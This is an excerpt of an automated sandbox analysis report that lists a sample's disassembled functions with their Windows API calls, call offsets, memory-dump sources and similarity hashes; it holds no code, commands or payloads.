                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessagePostSleep$RectWindow
                                            • String ID:
                                            • API String ID: 3382505437-0
                                            • Opcode ID: 33870c3620912eab5e97e47ca3876b639d1884ca054911cc0dba2d3edcbca317
                                            • Instruction ID: a81bcfe2b31b13e6ae873309532babe6e45a397e59a708f58dd3f7af2cf67e79
                                            • Opcode Fuzzy Hash: 33870c3620912eab5e97e47ca3876b639d1884ca054911cc0dba2d3edcbca317
                                            • Instruction Fuzzy Hash: F131AEB190022DEBDF04CF68D94DA9E7BB5FB44329F104229FA21EA2D1C3B09954CB91
                                            Function 0083DBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • IsWindowVisible.USER32(?), ref: 0083DBD7
                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0083DBF4
                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0083DC2C
                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0083DC52
                                            • _wcsstr.LIBCMT ref: 0083DC5C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                            • String ID:
                                            • API String ID: 3902887630-0
                                            • Opcode ID: 220985e608945bddb31cf2584184dfef3d26c2dcd1c59d7b41f3f4db05b9cb3c
                                            • Instruction ID: 8f8cb16faa95d053943dc779d85086ae624c17d4383550acc27095b0e1b80ca0
                                            • Opcode Fuzzy Hash: 220985e608945bddb31cf2584184dfef3d26c2dcd1c59d7b41f3f4db05b9cb3c
                                            • Instruction Fuzzy Hash: 5021F871214304ABEB159B39EC49E7B7BACFF85760F108029F90ACA191EAA1D84197E0
                                            Function 0083BC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0083BC90
                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0083BCC2
                                            • __itow.LIBCMT ref: 0083BCDA
                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0083BD00
                                            • __itow.LIBCMT ref: 0083BD11
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend$__itow
                                            • String ID:
                                            • API String ID: 3379773720-0
                                            • Opcode ID: 076ebde0459a908b01a8a37d3d1c7f3074a3ca51fa04de2164422ef29e076327
                                            • Instruction ID: 3ec48f44be62aad9ff4d27350ec8802cd74eb64fa6b52ec989e7456d5a47c986
                                            • Opcode Fuzzy Hash: 076ebde0459a908b01a8a37d3d1c7f3074a3ca51fa04de2164422ef29e076327
                                            • Instruction Fuzzy Hash: FA21A1B5600218BADB20AA699C46FDE7B68FF99710F101024FA05EB1C2EB70894587E2
                                            Function 00846318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 008050E6: _wcsncpy.LIBCMT ref: 008050FA
                                            • GetFileAttributesW.KERNEL32(?,?,?,?,008460C3), ref: 00846369
                                            • GetLastError.KERNEL32(?,?,?,008460C3), ref: 00846374
                                            • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,008460C3), ref: 00846388
                                            • _wcsrchr.LIBCMT ref: 008463AA
                                              • Part of subcall function 00846318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,008460C3), ref: 008463E0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                            • String ID:
                                            • API String ID: 3633006590-0
                                            • Opcode ID: da0b440650f1398e64505257b0f758e18b85c0ff25ea2a6869458f1e0d97ca09
                                            • Instruction ID: f9a2d52ab1d9612c16d99476b3c582934649081f4b6ae19b86a958976f2a30f2
                                            • Opcode Fuzzy Hash: da0b440650f1398e64505257b0f758e18b85c0ff25ea2a6869458f1e0d97ca09
                                            • Instruction Fuzzy Hash: E321C33190425D9ADB25AE7CAC46FEA23ACFF17360F100469F045D32D1FB6199D48A67
                                            Function 00858B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0085A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0085A84E
                                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00858BD3
                                            • WSAGetLastError.WSOCK32(00000000), ref: 00858BE2
                                            • connect.WSOCK32(00000000,?,00000010), ref: 00858BFE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ErrorLastconnectinet_addrsocket
                                            • String ID:
                                            • API String ID: 3701255441-0
                                            • Opcode ID: f7b0dc2b93849e6113536617ec5f633981cccb6df1e6631d8e2ace2bfe0a10bb
                                            • Instruction ID: 8ef336f30376dd310db4434267ea442a4f64cb406cc4557cfffcd19cba9b208f
                                            • Opcode Fuzzy Hash: f7b0dc2b93849e6113536617ec5f633981cccb6df1e6631d8e2ace2bfe0a10bb
                                            • Instruction Fuzzy Hash: 38216A312002189FCB50AB6CCC85B7E77A9FF48721F048559F956EB2D2CE74AC058B62
                                            Function 00858420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                            Download Yara Rule
                                            APIs
                                            • IsWindow.USER32(00000000), ref: 00858441
                                            • GetForegroundWindow.USER32 ref: 00858458
                                            • GetDC.USER32(00000000), ref: 00858494
                                            • GetPixel.GDI32(00000000,?,00000003), ref: 008584A0
                                            • ReleaseDC.USER32(00000000,00000003), ref: 008584DB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$ForegroundPixelRelease
                                            • String ID:
                                            • API String ID: 4156661090-0
                                            • Opcode ID: 6239a89f4235567c019ee906a4ec1b31968c7df225579c20915394c7bb3c17d8
                                            • Instruction ID: cca159aea87b17713a87b1b6a84f9f59e16966244ea7bc97bf0c4df2dedb9fb0
                                            • Opcode Fuzzy Hash: 6239a89f4235567c019ee906a4ec1b31968c7df225579c20915394c7bb3c17d8
                                            • Instruction Fuzzy Hash: F6214275A00204AFDB14EFA8DD85A9EB7E5FF48301F048479E959D7291DB70AD04CB90
                                            Function 0081AF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                            Download Yara Rule
                                            APIs
                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0081AFE3
                                            • SelectObject.GDI32(?,00000000), ref: 0081AFF2
                                            • BeginPath.GDI32(?), ref: 0081B009
                                            • SelectObject.GDI32(?,00000000), ref: 0081B033
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ObjectSelect$BeginCreatePath
                                            • String ID:
                                            • API String ID: 3225163088-0
                                            • Opcode ID: 3c971ee3c819d967adb18c99b46d59ebdf7905dc4599467095ca8581c91944e0
                                            • Instruction ID: 0a70682e3b2d0283e54de7f1d8902ebe8d1d961e3e8deba53c18e0fcb10c6edd
                                            • Opcode Fuzzy Hash: 3c971ee3c819d967adb18c99b46d59ebdf7905dc4599467095ca8581c91944e0
                                            • Instruction Fuzzy Hash: F5215CB0800709EFDF109F59EC88F9A7B7CFF25369F18421AE425D61A1C37088958B91
                                            Function 0082217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • __calloc_crt.LIBCMT ref: 008221A9
                                            • CreateThread.KERNEL32(?,?,008222DF,00000000,?,?), ref: 008221ED
                                            • GetLastError.KERNEL32 ref: 008221F7
                                            • _free.LIBCMT ref: 00822200
                                            • __dosmaperr.LIBCMT ref: 0082220B
                                              • Part of subcall function 00827C0E: __getptd_noexit.LIBCMT ref: 00827C0E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                            • String ID:
                                            • API String ID: 2664167353-0
                                            • Opcode ID: e14aaa05e94f4b3c442d4982025f1b4c5143cf3ea169ed57b541f2e9b5511950
                                            • Instruction ID: 8103ecc07a30ce2e43cb2219742a731798f3eaa2ba872bfa06fcb3042bfcd43f
                                            • Opcode Fuzzy Hash: e14aaa05e94f4b3c442d4982025f1b4c5143cf3ea169ed57b541f2e9b5511950
                                            • Instruction Fuzzy Hash: A611A132104366AF9B11AFAABC41DAB7B98FF05770B100529F914C6192EB72989187A2
                                            Function 0083ABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0083ABD7
                                            • GetLastError.KERNEL32(?,0083A69F,?,?,?), ref: 0083ABE1
                                            • GetProcessHeap.KERNEL32(00000008,?,?,0083A69F,?,?,?), ref: 0083ABF0
                                            • HeapAlloc.KERNEL32(00000000,?,0083A69F,?,?,?), ref: 0083ABF7
                                            • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0083AC0E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                            • String ID:
                                            • API String ID: 842720411-0
                                            • Opcode ID: bd6726dc7bc58e6ad7c65e7e0298227e88e803a0432c2de792aa7be1347d8816
                                            • Instruction ID: abcb917271f6ce1a88aedc7eedc825884d5dfa8e9d857c9ead2ad8b2d08ce27d
                                            • Opcode Fuzzy Hash: bd6726dc7bc58e6ad7c65e7e0298227e88e803a0432c2de792aa7be1347d8816
                                            • Instruction Fuzzy Hash: AC013C75200304BFDB155FA9EC88DAB7BADFF8A755B100829F945C32A0EA71DC41CBA1
                                            Function 00839ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CLSIDFromProgID.OLE32 ref: 00839ADC
                                            • ProgIDFromCLSID.OLE32(?,00000000), ref: 00839AF7
                                            • lstrcmpiW.KERNEL32(?,00000000), ref: 00839B05
                                            • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00839B15
                                            • CLSIDFromString.OLE32(?,?), ref: 00839B21
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                            • String ID:
                                            • API String ID: 3897988419-0
                                            • Opcode ID: 608a9b04ac4513ca68e78ad674aed6700383f7995f66b4c44ea34aa37207555d
                                            • Instruction ID: 4a14fe641e7e34a96617056a77556d2460033d9a9dead16784f5ba8593e2b0d9
                                            • Opcode Fuzzy Hash: 608a9b04ac4513ca68e78ad674aed6700383f7995f66b4c44ea34aa37207555d
                                            • Instruction Fuzzy Hash: D0018F76610229BFDB104F58EC44B9ABBEDFB84362F144434F985D2250E7B0DD009BE0
                                            Function 00847A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00847A74
                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00847A82
                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00847A8A
                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00847A94
                                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00847AD0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                            • String ID:
                                            • API String ID: 2833360925-0
                                            • Opcode ID: 2733060a8231b61f39c5e346881915d7f86cca63d3acc26cf0e6703474829c27
                                            • Instruction ID: f17b59b0f8c1aae56ab226171ef72722413650f5f4e7b8e5ca38e274f00b81ec
                                            • Opcode Fuzzy Hash: 2733060a8231b61f39c5e346881915d7f86cca63d3acc26cf0e6703474829c27
                                            • Instruction Fuzzy Hash: 89011335D0862DABDF00EFA8E848AEDBB78FF08751F050455E502F2294DB30965487A5
                                            Function 0083AAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0083AADA
                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0083AAE4
                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0083AAF3
                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0083AAFA
                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0083AB10
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                            • String ID:
                                            • API String ID: 44706859-0
                                            • Opcode ID: 1fc4bc1d3e8e91d3082287c68764b4344b501082cb5deb635e64191cc93cade4
                                            • Instruction ID: 634db8ef6bc1e1ce9119b70d8014e90efe39ee9d31a3d2986b076f39bd26e8ef
                                            • Opcode Fuzzy Hash: 1fc4bc1d3e8e91d3082287c68764b4344b501082cb5deb635e64191cc93cade4
                                            • Instruction Fuzzy Hash: 9BF06275200308AFEB150FA8EC88E677B6DFF85764F100529F941C7190DB619C01CBA1
                                            Function 0083AA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0083AA79
                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0083AA83
                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0083AA92
                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0083AA99
                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0083AAAF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                            • String ID:
                                            • API String ID: 44706859-0
                                            • Opcode ID: 0b5b425c54cb9891a30bb0052a4519da0b5586f91353c1cad4df7e4d5a893b7d
                                            • Instruction ID: 19aa43834f4580d12ec9047fedba1512ee5898ed1d8efcd2e82b17e74940e761
                                            • Opcode Fuzzy Hash: 0b5b425c54cb9891a30bb0052a4519da0b5586f91353c1cad4df7e4d5a893b7d
                                            • Instruction Fuzzy Hash: 09F062762013146FEB115FA8EC8DE677BACFF89754F100419F941C7190DB619C41CBA1
                                            Function 0083EC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetDlgItem.USER32(?,000003E9), ref: 0083EC94
                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 0083ECAB
                                            • MessageBeep.USER32(00000000), ref: 0083ECC3
                                            • KillTimer.USER32(?,0000040A), ref: 0083ECDF
                                            • EndDialog.USER32(?,00000001), ref: 0083ECF9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                            • String ID:
                                            • API String ID: 3741023627-0
                                            • Opcode ID: 7cb64e62a1777328e03140efcdc7a61f1de343876239c3cee0955f625ddf2878
                                            • Instruction ID: 1aeba2eb23bcc34dc02c85478b157fc0469e0321aad2c4732c2852c2acedf44d
                                            • Opcode Fuzzy Hash: 7cb64e62a1777328e03140efcdc7a61f1de343876239c3cee0955f625ddf2878
                                            • Instruction Fuzzy Hash: AF018130510719ABEB246B54DE4EB9A77B8FF50705F001559B582B14E1EBF0AA56CB80
                                            Function 0081B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                            Download Yara Rule
                                            APIs
                                            • EndPath.GDI32(?), ref: 0081B0BA
                                            • StrokeAndFillPath.GDI32(?,?,0087E680,00000000,?,?,?), ref: 0081B0D6
                                            • SelectObject.GDI32(?,00000000), ref: 0081B0E9
                                            • DeleteObject.GDI32 ref: 0081B0FC
                                            • StrokePath.GDI32(?), ref: 0081B117
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                            • String ID:
                                            • API String ID: 2625713937-0
                                            • Opcode ID: 7d5fbeb48535b78afb43ca8722d8493636e3965f10be2b257c6e2a9dc4317895
                                            • Instruction ID: 23607c282a73d6d2902c4d6b19c28673485617699e1496c3392e9bcfb0b12378
                                            • Opcode Fuzzy Hash: 7d5fbeb48535b78afb43ca8722d8493636e3965f10be2b257c6e2a9dc4317895
                                            • Instruction Fuzzy Hash: E6F0AF34004648ABDF21AF69EC4DB953B79BF22366F088315E469890F2C73589A6DF50
                                            Function 0084F23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CoInitialize.OLE32(00000000), ref: 0084F2DA
                                            • CoCreateInstance.OLE32(0088DA7C,00000000,00000001,0088D8EC,?), ref: 0084F2F2
                                            • CoUninitialize.OLE32 ref: 0084F555
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CreateInitializeInstanceUninitialize
                                            • String ID: .lnk
                                            • API String ID: 948891078-24824748
                                            • Opcode ID: 0551c978e5d646811b90daed92da81d3c6d14d2f9c811a1cea8c03b5dcc6fd11
